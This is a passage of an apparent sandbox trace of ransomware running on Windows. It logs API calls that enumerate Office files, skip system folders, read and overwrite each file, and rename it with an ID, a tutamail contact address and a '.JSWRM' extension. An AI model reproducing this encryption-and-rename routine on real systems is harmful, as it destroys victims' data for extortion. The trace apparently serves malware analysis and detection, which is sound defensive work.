(HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0139.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0139.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0139.721] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7EN.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7en.dub"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7EN.dub.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7en.dub.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0139.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0139.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0139.722] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc5360180, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc5360180, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd93746c2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x186200, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSSP7EN.LEX", cAlternateFileName="")) returned 1 [0139.722] lstrcmpiW (lpString1="MSSP7EN.LEX", lpString2=".") returned 1 [0139.722] lstrcmpiW (lpString1="MSSP7EN.LEX", lpString2="..") returned 1 [0139.722] lstrcmpiW (lpString1="MSSP7EN.LEX", lpString2="...") returned 1 [0139.722] lstrcmpiW (lpString1="MSSP7EN.LEX", lpString2="windows") returned -1 [0139.722] lstrcmpiW (lpString1="MSSP7EN.LEX", lpString2="recovery") returned -1 [0139.722] lstrcmpiW (lpString1="MSSP7EN.LEX", lpString2="perflogs") returned -1 [0139.722] lstrcmpiW (lpString1="MSSP7EN.LEX", lpString2="documents and settings") returned 1 [0139.722] lstrcmpiW (lpString1="MSSP7EN.LEX", lpString2="$RECYCLE.BIN") returned 1 [0139.722] lstrcmpiW (lpString1="MSSP7EN.LEX", lpString2="system volume information") returned -1 [0139.722] lstrcmpiW (lpString1="MSSP7EN.LEX", lpString2="msocache") returned 1 [0139.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0139.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7EN.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7EN.LEX", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSP7EN.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0139.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0139.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7EN.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7EN.LEX", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSP7EN.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0139.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0139.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0139.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0139.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7en.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.723] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1597952) returned 1 [0139.723] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.724] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0139.724] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.737] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.737] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0139.738] CloseHandle (hObject=0x238) returned 1 [0139.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0139.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0139.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0139.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0139.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0139.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0139.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0139.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0139.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0139.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0139.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0139.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0139.738] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7en.lex"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7EN.LEX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7en.lex.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0139.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0139.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0139.740] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc53863b3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc53863b3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc53863b3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSSP7ES.dub", cAlternateFileName="")) returned 1 [0139.740] lstrcmpiW (lpString1="MSSP7ES.dub", lpString2=".") returned 1 [0139.740] lstrcmpiW (lpString1="MSSP7ES.dub", lpString2="..") returned 1 [0139.740] lstrcmpiW (lpString1="MSSP7ES.dub", lpString2="...") returned 1 [0139.740] lstrcmpiW (lpString1="MSSP7ES.dub", lpString2="windows") returned -1 [0139.740] lstrcmpiW (lpString1="MSSP7ES.dub", lpString2="recovery") returned -1 [0139.740] lstrcmpiW (lpString1="MSSP7ES.dub", lpString2="perflogs") returned -1 [0139.740] lstrcmpiW (lpString1="MSSP7ES.dub", lpString2="documents and settings") returned 1 [0139.740] lstrcmpiW (lpString1="MSSP7ES.dub", lpString2="$RECYCLE.BIN") returned 1 [0139.740] lstrcmpiW (lpString1="MSSP7ES.dub", lpString2="system volume information") returned -1 [0139.740] lstrcmpiW (lpString1="MSSP7ES.dub", lpString2="msocache") returned 1 [0139.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0139.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7ES.dub", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7ES.dub", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSP7ES.dub", lpUsedDefaultChar=0x0) returned 11 [0139.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0139.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0139.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7ES.dub", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7ES.dub", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSP7ES.dub", lpUsedDefaultChar=0x0) returned 11 [0139.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0139.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0139.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0139.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.740] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0139.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7ES.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7es.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.741] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16) returned 1 [0139.741] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.741] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0139.741] ReadFile (in: hFile=0x238, lpBuffer=0x23a420, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23a420*, lpNumberOfBytesRead=0x345e89c*=0x10, lpOverlapped=0x0) returned 1 [0139.742] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.742] WriteFile (in: hFile=0x238, lpBuffer=0x23a420*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23a420*, lpNumberOfBytesWritten=0x345e898*=0x10, lpOverlapped=0x0) returned 1 [0139.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0139.742] CloseHandle (hObject=0x238) returned 1 [0139.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0139.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.742] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0139.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0139.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0139.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0139.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0139.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0139.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0139.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0139.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0139.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0139.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0139.743] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7ES.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7es.dub"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7ES.dub.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7es.dub.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0139.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0139.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0139.744] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc54dd8eb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc54dd8eb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd943329c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1ec600, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSSP7ES.LEX", cAlternateFileName="")) returned 1 [0139.744] lstrcmpiW (lpString1="MSSP7ES.LEX", lpString2=".") returned 1 [0139.744] lstrcmpiW (lpString1="MSSP7ES.LEX", lpString2="..") returned 1 [0139.744] lstrcmpiW (lpString1="MSSP7ES.LEX", lpString2="...") returned 1 [0139.744] lstrcmpiW (lpString1="MSSP7ES.LEX", lpString2="windows") returned -1 [0139.744] lstrcmpiW (lpString1="MSSP7ES.LEX", lpString2="recovery") returned -1 [0139.744] lstrcmpiW (lpString1="MSSP7ES.LEX", lpString2="perflogs") returned -1 [0139.744] lstrcmpiW (lpString1="MSSP7ES.LEX", lpString2="documents and settings") returned 1 [0139.744] lstrcmpiW (lpString1="MSSP7ES.LEX", lpString2="$RECYCLE.BIN") returned 1 [0139.744] lstrcmpiW (lpString1="MSSP7ES.LEX", lpString2="system volume information") returned -1 [0139.744] lstrcmpiW (lpString1="MSSP7ES.LEX", lpString2="msocache") returned 1 [0139.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0139.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7ES.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7ES.LEX", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSP7ES.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0139.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0139.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7ES.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7ES.LEX", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSP7ES.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0139.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0139.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0139.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0139.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7ES.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7es.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.745] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2016768) returned 1 [0139.745] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0139.746] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.759] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.759] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0139.759] CloseHandle (hObject=0x238) returned 1 [0139.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0139.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0139.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0139.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0139.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0139.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0139.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0139.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0139.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0139.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0139.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0139.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0139.760] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7ES.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7es.lex"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7ES.LEX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7es.lex.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0139.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0139.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0139.761] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc541ed37, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc541ed37, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc541ed37, 